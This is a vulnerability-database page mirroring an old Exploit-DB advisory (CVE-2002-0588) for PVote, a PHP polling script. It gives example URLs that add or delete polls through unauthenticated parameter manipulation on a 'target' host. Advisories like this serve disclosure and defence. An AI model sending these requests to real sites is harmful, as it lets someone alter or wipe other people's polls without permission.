Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbDaniel NyströmEDB-ID:21391
HistoryApr 18, 2002 - 12:00 a.m.

PVote 1.0/1.5 - Poll Content Manipulation

2002-04-1800:00:00
Daniel Nyström
www.exploit-db.com
24

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/4540/info

PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.

It is possible for a remote attacker to add/delete web polls just by manipulating the values of URL parameters. 

ADD A POLL:

http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad

where question refers to the topic of the topic to be added by the attack.

DELETE A POLL:

http://target/pvote/del.php?pollorder=1

where pollorder is the poll 'id' number for the poll to be deleted.

Related

cve 1
nvd 1
cvelist 1
cve
cve
CVE-2002-0588
2002-06-18 04:00:00
nvd
nvd
CVE-2002-0588
2002-06-18 04:00:00
cvelist
cvelist
CVE-2002-0588
2002-06-11 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:21391
cve1nvd1cvelist1